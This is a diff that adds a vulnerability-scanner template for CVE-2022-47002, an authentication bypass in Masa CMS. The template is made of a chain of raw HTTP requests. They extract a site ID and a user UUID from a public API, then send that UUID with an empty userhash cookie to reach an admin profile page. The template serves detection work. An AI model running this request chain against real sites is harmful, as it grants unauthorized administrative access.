diff --git a/cves/2022/CVE-2022-47002.yaml b/cves/2022/CVE-2022-47002.yaml new file mode 100644 index 0000000000..23f5e8fd20 --- /dev/null +++ b/cves/2022/CVE-2022-47002.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-47002 +info: + name: Masa CMS - Authentication Bypass + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + A vulnerability in the Remember Me function of Masa CMS v7.2, 7.3, and 7.4-beta allows attackers to bypass authentication via a crafted web request. + reference: + - https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-47002 + metadata: + verified: true + tags: cve,cve2022,auth-bypass,cms,masa + +requests: + - raw: + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1 + Host: {{Hostname}} + + - | + GET /admin/?muraAction=cEditProfile.edit HTTP/1.1 + Host: {{Hostname}} + Cookie: userid={{uuid}}; userhash= + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: dsl + condition: and + dsl: + - 'contains(body_3,"\"userid\"")' + + - type: word + part: body_3 + words: + - "Edit Profile" + + extractors: + - type: regex + part: body + name: siteid + group: 1 + internal: true + regex: + - 'siteid:"(.*?)"' + + - type: regex + part: body + name: uuid + group: 1 + internal: true + regex: + - '"lastupdatebyid":"([A-F0-9-]+)"'